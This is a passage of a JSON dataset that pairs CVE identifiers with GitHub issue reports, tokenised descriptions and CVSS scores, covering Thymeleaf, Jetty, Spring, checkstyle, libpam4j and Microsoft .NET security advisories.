  87240. "severity": "HIGH",
  87241. "baseScore": 7.4,
  87242. "impactScore": 5.2,
  87243. "exploitabilityScore": 2.2
  87244. },
  87245. {
  87246. "CVE_ID": "CVE-2021-43466",
  87247. "Issue_Url_old": "https://github.com/thymeleaf/thymeleaf-spring/issues/263",
  87248. "Issue_Url_new": "https://github.com/thymeleaf/thymeleaf-spring/issues/263",
  87249. "Repo_new": "thymeleaf/thymeleaf-spring",
  87250. "Issue_Created_At": "2021-11-10T17:39:51Z",
  87251. "description": "High vulnerability issue 'thymeleaf spring5' dependency JAR. Version of Thymeleaf : FILETAG Environment: Spring Boot NUMBERTAG Detailed steps to reproduce your issue: Veracode APITAG Composition Analysis' finds below given High vulnerability issue in all versions of 'thymeleaf spring5' dependency Jars. Any possible workarounds you may have found No High Severity CVETAG URLTAG Template Injection: thymeleaf spring5 is vulnerable to template injection. An attacker can inject malicious input through the render function in APITAG , leading to remote code execution. Can you please look into it ?",
  87252. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87253. "severity": "CRITICAL",
  87254. "baseScore": 9.8,
  87255. "impactScore": 5.9,
  87256. "exploitabilityScore": 3.9
  87257. },
  87258. {
  87259. "CVE_ID": "CVE-2019-17572",
  87260. "Issue_Url_old": "https://github.com/apache/rocketmq/issues/1637",
  87261. "Issue_Url_new": "https://github.com/apache/rocketmq/issues/1637",
  87262. "Repo_new": "apache/rocketmq",
  87263. "Issue_Created_At": "2019-12-04T13:17:26Z",
  87264. "description": "APITAG \u6d4b\u8bd5\u73af\u5883\u6761\u4ef6\uff1a APITAG APITAG NUMBERTAG Windows7 pro NUMBERTAG APITAG NUMBERTAG PATHTAG FILETAG FILETAG",
  87265. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  87266. "severity": "MEDIUM",
  87267. "baseScore": 5.3,
  87268. "impactScore": 1.4,
  87269. "exploitabilityScore": 3.9
  87270. },
  87271. {
  87272. "CVE_ID": "CVE-2022-22950",
  87273. "Issue_Url_old": "https://github.com/spring-projects/spring-framework/issues/28257",
  87274. "Issue_Url_new": "https://github.com/spring-projects/spring-framework/issues/28257",
  87275. "Repo_new": "spring-projects/spring-framework",
  87276. "Issue_Created_At": "2022-03-31T08:32:25Z",
  87277. "description": "Improve diagnostics in APITAG for large array creation. Backport of gh NUMBERTAG",
  87278. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  87279. "severity": "MEDIUM",
  87280. "baseScore": 6.5,
  87281. "impactScore": 3.6,
  87282. "exploitabilityScore": 2.8
  87283. },
  87284. {
  87285. "CVE_ID": "CVE-2022-22950",
  87286. "Issue_Url_old": "https://github.com/spring-projects/spring-framework/issues/28145",
  87287. "Issue_Url_new": "https://github.com/spring-projects/spring-framework/issues/28145",
  87288. "Repo_new": "spring-projects/spring-framework",
  87289. "Issue_Created_At": "2022-03-08T15:53:04Z",
  87290. "description": "Improve diagnostics in APITAG for large array creation. Attempting to create a large array in a APITAG expression can result in an ERRORTAG . Although the JVM recovers from that, we should throw an exception with a meaningful error message in order to improve diagnostics for the user.",
  87291. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  87292. "severity": "MEDIUM",
  87293. "baseScore": 6.5,
  87294. "impactScore": 3.6,
  87295. "exploitabilityScore": 2.8
  87296. },
  87297. {
  87298. "CVE_ID": "CVE-2016-5007",
  87299. "Issue_Url_old": "https://github.com/spring-projects/spring-security/issues/3964",
  87300. "Issue_Url_new": "https://github.com/spring-projects/spring-security/issues/3964",
  87301. "Repo_new": "spring-projects/spring-security",
  87302. "Issue_Created_At": "2016-07-06T20:46:57Z",
  87303. "description": "Add APITAG We should support a request matcher that integrates with Spring MVC",
  87304. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87305. "severity": "HIGH",
  87306. "baseScore": 7.5,
  87307. "impactScore": 3.6,
  87308. "exploitabilityScore": 3.9
  87309. },
  87310. {
  87311. "CVE_ID": "CVE-2019-17638",
  87312. "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/4936",
  87313. "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/4936",
  87314. "Repo_new": "eclipse/jetty.project",
  87315. "Issue_Created_At": "2020-06-03T14:33:35Z",
  87316. "description": "Response header overflow leads to buffer corruptions in embedded Jetty. Jetty version APITAG (but traced it back to APITAG ) Java version ERRORTAG OS type/version APITAG Description We run several Spring Boot NUMBERTAG applications, originally deployed as WAR files on a standalone Jetty server ( APITAG ). Recently we changed these to use an embedded Jetty server, which included an upgrade to Jetty APITAG . Subsequently, we intermittently observed errors in one of our applications, serving an admin page using webjars. The logs indicated errors such as: ERRORTAG This was a valid request from the client side, but somehow the HTTP method got corrupted. ERRORTAG Truncated this one, see below for an example of a stacktrace. ERRORTAG ERRORTAG The admin page itself would also become highly unresponsive, and some files would fail to be served. A restart of the application would fix the errors, but it would also resolve itself \"eventually\". Moreover, the errors' frequency grew with load, but we couldn't reproduce it consistently. This application in particular was affected the most, but we also observed the errors in other applications. We managed to reproduce the issue by creating an endpoint in which we would explicitly send a response header larger than the configured maximum size ( APITAG ), after which an application would immediately become unresponsive and all aforementioned errors would start appearing. We confirmed this behavior wasn't present in our previous Jetty version APITAG , and found it was first introduced in APITAG . APITAG related to URLTAG This might also be the same issue as observed in URLTAG but APITAG which included the potential fix didn't resolve the issue for us. We have for now resolved this internally by allowing bigger response headers, as we do have a use case for these internally. I have provided below a test that can be used to trigger the behavior. 
It consists of sending a (too) large response header, after which we concurrently trigger many requests in order to reproduce the behavior. From my testing concurrency is necessary, which could explain why the error was more frequently observed in our webpage (it serves many webjars separately rather than bundling). Lastly, from my brief foray into exploring this issue, in one of the cases I noticed that when the header overflow was triggered, which released the APITAG buffer (but before any error handling was done), this same buffer was used by APITAG , but its limit was set to NUMBERTAG These are two different requests, and could explain the HTTP method corruption for instance. So it seems that somehow the buffer cleanup in case of a header overflow is perhaps not correctly handled. If you need any more information, please do let me know. Example test Please look at the logs to observe the triggered errors. Further below I have also provided some sample stacktraces that can be reproduced by this test. ERRORTAG Example stacktraces ERRORTAG ERRORTAG ERRORTAG",
  87317. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
  87318. "severity": "CRITICAL",
  87319. "baseScore": 9.4,
  87320. "impactScore": 5.5,
  87321. "exploitabilityScore": 3.9
  87322. },
  87323. {
  87324. "CVE_ID": "CVE-2019-10782",
  87325. "Issue_Url_old": "https://github.com/checkstyle/checkstyle/issues/7468",
  87326. "Issue_Url_new": "https://github.com/checkstyle/checkstyle/issues/7468",
  87327. "Repo_new": "checkstyle/checkstyle",
  87328. "Issue_Created_At": "2020-01-13T17:42:15Z",
  87329. "description": "Sonar violation: Disable XML external entity (XXE) processing. URLTAG Vulnerability at FILETAG Disable XML external entity (XXE) processing. Reply from Security expert: > Hi Roman, The next line APITAG does disable the loading of external entities when the system property is not configured by the user. URLTAG I would validate that you are using all of the prevention methods suggested in this document here: FILETAG The cases you need to be concerned with are any involving the use of the APITAG If you find any cases you are missing, then you may be vulnerable. In which case, please let me know. Cheers, Jonathan Leitschuh TODO: We need to investigate this to make sure if we are vulnerable",
  87330. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  87331. "severity": "MEDIUM",
  87332. "baseScore": 5.3,
  87333. "impactScore": 1.4,
  87334. "exploitabilityScore": 3.9
  87335. },
  87336. {
  87337. "CVE_ID": "CVE-2019-10753",
  87338. "Issue_Url_old": "https://github.com/diffplug/spotless/issues/360",
  87339. "Issue_Url_new": "https://github.com/diffplug/spotless/issues/360",
  87340. "Repo_new": "diffplug/spotless",
  87341. "Issue_Created_At": "2019-02-15T21:29:22Z",
  87342. "description": "FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JAR files were compromised, any developers using these could continue to be infected past updating to fix this. URLTAG URLTAG URLTAG This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical; POC code exists already to maliciously compromise jar file inflight. See: URLTAG URLTAG To fix: We need to update our APITAG so that artifacts are resolved over HTTPS instead of HTTP. I've been finding this vulnerability in a lot of places today and have responsibly disclosed it to some of the larger organizations involved: URLTAG",
  87343. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87344. "severity": "MEDIUM",
  87345. "baseScore": 5.9,
  87346. "impactScore": 3.6,
  87347. "exploitabilityScore": 2.2
  87348. },
  87349. {
  87350. "CVE_ID": "CVE-2017-12197",
  87351. "Issue_Url_old": "https://github.com/kohsuke/libpam4j/issues/18",
  87352. "Issue_Url_new": "https://github.com/kohsuke/libpam4j/issues/18",
  87353. "Repo_new": "kohsuke/libpam4j",
  87354. "Issue_Created_At": "2017-06-05T22:05:38Z",
  87355. "description": "libpam4j authenticates invalid accounts. Currently, the call to pam_acct_mgmt is commented out in APITAG Thus any login restrictions configured via PAM account modules are ignored by APITAG This usually affects, among others, settings in PATHTAG (pam_access), /etc/nologin (pam_nologin) and host/service name authorization of pam_ldap. Any return value other than PAM_SUCCESS from pam_acct_mgmt should prevent a successful authentication.",
  87356. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  87357. "severity": "MEDIUM",
  87358. "baseScore": 6.5,
  87359. "impactScore": 3.6,
  87360. "exploitabilityScore": 2.8
  87361. },
  87362. {
  87363. "CVE_ID": "CVE-2021-1723",
  87364. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/170",
  87365. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/170",
  87366. "Repo_new": "dotnet/announcements",
  87367. "Issue_Created_At": "2021-01-12T18:19:41Z",
  87368. "description": "Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core and ASP.NET NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists in the way Kestrel parses HTTP NUMBERTAG requests. The security update addresses the vulnerability by fixing the way the Kestrel parses HTTP NUMBERTAG requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or .NET NUMBERTAG application running on .NET Core NUMBERTAG or .NET NUMBERTAG or lower respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You will see output like the following; ERRORTAG If you are using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you are using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87369. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87370. "severity": "HIGH",
  87371. "baseScore": 7.5,
  87372. "impactScore": 3.6,
  87373. "exploitabilityScore": 3.9
  87374. },
  87375. {
  87376. "CVE_ID": "CVE-2020-0603",
  87377. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/403",
  87378. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/403",
  87379. "Repo_new": "aspnet/announcements",
  87380. "Issue_Created_At": "2020-01-14T18:01:38Z",
  87381. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a remote code execution vulnerability exists in ASP.NET Core software when the software fails to handle objects in memory. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles in memory. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected runtime or your application has a dependency on any of the packages listed in affected packages affected packages , you are exposed to the vulnerability. 
APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG application using APITAG APITAG APITAG Affected packages Any ASP.NET Core based application that uses any of the vulnerable packages shown below, or any ASP.NET Core application running on .NET Core NUMBERTAG or NUMBERTAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG How do I fix the issue? First examine the versions of .NET Core you have installed. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG APITAG APITAG Updated runtimes and SDKs For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG If you have multiple runtimes or SDKs installed, you must update all runtimes or SDKs separately. Once you've installed the updated runtime or SDK, restart your apps for the update to take effect. Applications targeting .NET Core runtime Update your runtime and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks then restart your application. Applications targeting .NET Framework First update your .NET Core runtimes and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks . As targeting .NET Framework adds dependencies for various packages you must update the dependencies your application uses, recompile and redeploy your application. Direct dependencies Direct dependencies are discoverable by examining your csproj file. 
They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG that, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. 
The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: v Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG Fixing Dependencies APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. 
The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. 
If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Brennan Conroy of Microsoft Corporation External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87383. "severity": "HIGH",
  87384. "baseScore": 8.8,
  87385. "impactScore": 5.9,
  87386. "exploitabilityScore": 2.8
  87387. },
  87388. {
  87389. "CVE_ID": "CVE-2019-0564",
  87390. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/334",
  87391. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/334",
  87392. "Repo_new": "aspnet/announcements",
  87393. "Issue_Created_At": "2019-01-08T18:04:59Z",
  87394. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses any of following vulnerable packages: Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Applications that use APITAG or APITAG The vulnerable packages affected software are distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. 
If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG or the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. You will not see SDK versions if you have only installed the runtime. Applications not using APITAG or APITAG Some of the affected assemblies are also available separately as a APITAG package. If you are not using APITAG or APITAG you may still be affected if you are referencing the packages listed above. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . 
APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. 
If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? Updating the version of APITAG APITAG and APITAG If your host version is a NUMBERTAG host, you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. 
If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . 
Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87395. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87396. "severity": "HIGH",
  87397. "baseScore": 7.5,
  87398. "impactScore": 3.6,
  87399. "exploitabilityScore": 3.9
  87400. },
  87401. {
  87402. "CVE_ID": "CVE-2017-8585",
  87403. "Issue_Url_old": "https://github.com/dotnet/corefx/issues/24703",
  87404. "Issue_Url_new": "https://github.com/dotnet/runtime/issues/23876",
  87405. "Repo_new": "dotnet/runtime",
  87406. "Issue_Created_At": "2017-10-17T21:18:37Z",
  87407. "description": "Announcement] APITAG Microsoft Security Advisory CVETAG : Malformed Culture can cause application crash. Microsoft Security Advisory CVETAG Malformed Culture can cause application to crash Executive Summary Microsoft is releasing this security advisory to provide information about a vulnerability in the public versions of .NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications correctly. Microsoft is aware of a security vulnerability in the public version of .NET Core where a malformed string request could cause an application to crash and lead to a denial of service. System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG and NUMBERTAG Developers are advised to update their .NET Core SDK to version NUMBERTAG Mitigation Factors .NET Core NUMBERTAG is not affected by this issue. Advisory FAQ How do I know if I am affected? Any application running against .NET Core NUMBERTAG or lower versions, or NUMBERTAG or lower versions is affected. The latest version of the .NET core runtime you have installed in your computer can be listed by running APITAG . Running that command produces an output similar to the following: ERRORTAG As this command only displays the latest version of the runtime installed (or the version set in the FILETAG file), it may hide the fact that you have a vulnerable runtime. A complete list of runtimes can be discovered by performing a directory listing in the install root directories. The default root directories are listed in the following table: | Operating System | Location | | | | | Windows | APITAG PATHTAG | | APITAG | PATHTAG | | APITAG Linux platforms URLTAG | PATHTAG | Each 